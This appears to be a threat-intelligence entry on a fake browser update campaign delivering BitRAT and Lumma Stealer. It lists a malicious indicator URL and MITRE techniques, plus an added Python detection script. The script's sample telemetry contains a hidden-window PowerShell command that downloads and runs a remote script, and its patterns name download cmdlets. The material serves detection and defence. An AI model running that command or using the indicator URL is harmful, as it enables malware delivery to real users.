Description
This report details a malicious campaign in which adversaries used fake browser update prompts to lure victims into downloading and executing malware. The infection chain begins with malicious JavaScript injected into compromised websites, which redirects visitors to pages mimicking legitimate browser update sites. These fake update pages host ZIP archives containing PowerShell scripts that download and execute BitRAT and Lumma Stealer. The report provides in-depth analysis of the attack flow, payload characteristics, encryption routines, and command-and-control infrastructure used by these malware families.
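The chain above leaves two observables a defender can hunt for: a PowerShell script being launched out of the folder where a user unpacked the fake "update" ZIP, and web requests to the page's indicator. The script below is an added example written for this page, not code from the report or from either malware family. It runs heuristics over constructed, Sysmon-style process-creation records and a constructed proxy log; the record formats, the field names (`image`, `parent`, `cmdline`), the staging-directory and network-cmdlet patterns, and every host name, path and IP address in the sample data are assumptions made for illustration. The only value taken from the page is the indicator URL.

```python
"""Hunt for the fake-browser-update chain in constructed telemetry (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List
from urllib.parse import urlparse

# The single indicator listed on this page; the domain is derived from it.
IOC_URLS = {"http://chatgpt-app.cloud/q1Vz6N"}
IOC_DOMAINS = {urlparse(u).hostname for u in IOC_URLS}

# Heuristics (assumptions for this example, not taken from the report).
POWERSHELL = re.compile(r"\\(powershell|powershell_ise|pwsh)\.exe$", re.I)
STAGING_DIR = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData\\Local\\Temp)\\", re.I)
SCRIPT_ARG = re.compile(r"\S+\.ps1\b", re.I)
NET_CMDLET = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile|start-bitstransfer",
    re.I,
)
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')  # key=value; quoted values may contain spaces


@dataclass(frozen=True)
class Finding:
    source: str    # "process" or "proxy"
    host: str
    reason: str
    evidence: str


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed key=value process-creation record into a dict."""
    return {k: v.strip('"') for k, v in KV.findall(line)}


def check_process(ev: Dict[str, str]) -> List[Finding]:
    """Apply the two PowerShell heuristics to one parsed process event."""
    findings: List[Finding] = []
    host = ev.get("host", "?")
    image, parent, cmd = ev.get("image", ""), ev.get("parent", ""), ev.get("cmdline", "")
    if not POWERSHELL.search(image):
        return findings
    # Explorer launching a .ps1 from Downloads/Temp is what a victim double-clicking
    # a script extracted from the fake-update ZIP would produce.
    script = SCRIPT_ARG.search(cmd)
    if script and STAGING_DIR.search(script.group(0)) and parent.lower().endswith("\\explorer.exe"):
        findings.append(Finding("process", host,
                                "Explorer launched a .ps1 from a user staging directory", script.group(0)))
    # A network-fetching cmdlet on the command line matches the downloader stage.
    if NET_CMDLET.search(cmd):
        findings.append(Finding("process", host,
                                "PowerShell command line fetches content from the network", cmd))
    return findings


def check_proxy(line: str) -> List[Finding]:
    """Match one constructed proxy record (ts host method url status) against the IOC.

    Matching on the domain, not only the exact URL, also catches other paths
    and subdomains of the same infrastructure."""
    _ts, host, method, url, status = line.split()
    domain = urlparse(url).hostname or ""
    if url in IOC_URLS or any(domain == d or domain.endswith("." + d) for d in IOC_DOMAINS):
        return [Finding("proxy", host, "request to fake-update indicator", f"{method} {url} -> {status}")]
    return []


def hunt(process_lines: Iterable[str], proxy_lines: Iterable[str]) -> List[Finding]:
    """Run both checks over the supplied telemetry and return all findings."""
    out: List[Finding] = []
    for line in process_lines:
        out.extend(check_process(parse_event(line)))
    for line in proxy_lines:
        out.extend(check_proxy(line))
    return out


# Constructed sample telemetry (hosts, users, paths and IPs are invented).
PROCESS_EVENTS = [
    r"ts=2024-06-03T10:01:20Z host=WS01 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r'parent=C:\Windows\explorer.exe cmdline="powershell.exe -ep bypass -w hidden -File C:\Users\alice\Downloads\ChromeUpdate\Update.ps1"',
    r"ts=2024-06-03T10:01:25Z host=WS02 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r'parent=C:\Windows\System32\cmd.exe cmdline="powershell.exe -nop -w hidden -c iwr http://203.0.113.10/s.txt -OutFile C:\Users\bob\AppData\Local\Temp\u.ps1; & C:\Users\bob\AppData\Local\Temp\u.ps1"',
    r"ts=2024-06-03T10:02:00Z host=WS03 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r'parent=C:\Windows\System32\svchost.exe cmdline="powershell.exe -NoProfile -File C:\ProgramData\Corp\Maintenance.ps1"',
    r"ts=2024-06-03T10:02:10Z host=WS04 image=C:\Windows\System32\notepad.exe parent=C:\Windows\explorer.exe cmdline=notepad.exe",
]
PROXY_LOGS = [
    "2024-06-03T10:01:15Z WS01 GET http://chatgpt-app.cloud/q1Vz6N 302",
    "2024-06-03T10:01:16Z WS01 GET https://www.example.com/ 200",
    "2024-06-03T10:03:00Z WS05 GET http://cdn.chatgpt-app.cloud/x 200",
]

if __name__ == "__main__":
    for f in hunt(PROCESS_EVENTS, PROXY_LOGS):
        print(f"[{f.source}] {f.host}: {f.reason} :: {f.evidence}")
```

The sample deliberately includes a script in a staging directory that is run from `cmd.exe` rather than Explorer; it is flagged only for the network fetch, which shows why the parent-process condition matters for the first rule. Administrators who legitimately run downloaded scripts from their own Downloads folder will trip the first heuristic, so in production it belongs in a hunt or a correlated alert rather than a block rule.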
Date
| Published | Created | Modified |
|---|---|---|
| June 3, 2024, 11:26 a.m. | June 3, 2024, 11:26 a.m. | June 3, 2024, 11:48 a.m. |
Indicators
http://chatgpt-app.cloud/q1Vz6N
Malware
BitRAT
Lumma Stealer
Attack Patterns
T1056.004 (Input Capture: Credential API Hooking)
T1021.004 (Remote Services: SSH)
T1583.001 (Acquire Infrastructure: Domains)
T1569.002 (System Services: Service Execution)
T1583.003 (Acquire Infrastructure: Virtual Private Server)
T1574.002 (Hijack Execution Flow: DLL Side-Loading)
T1059.005 (Command and Scripting Interpreter: Visual Basic)
T1059.001 (Command and Scripting Interpreter: PowerShell)
T1059.007 (Command and Scripting Interpreter: JavaScript)
T1056.001 (Input Capture: Keylogging)
T1071.001 (Application Layer Protocol: Web Protocols)
T1518.001 (Software Discovery: Security Software Discovery)
T1204.002 (User Execution: Malicious File)
T1489 (Service Stop)
T1105 (Ingress Tool Transfer)
T1219 (Remote Access Software)
T1027 (Obfuscated Files or Information)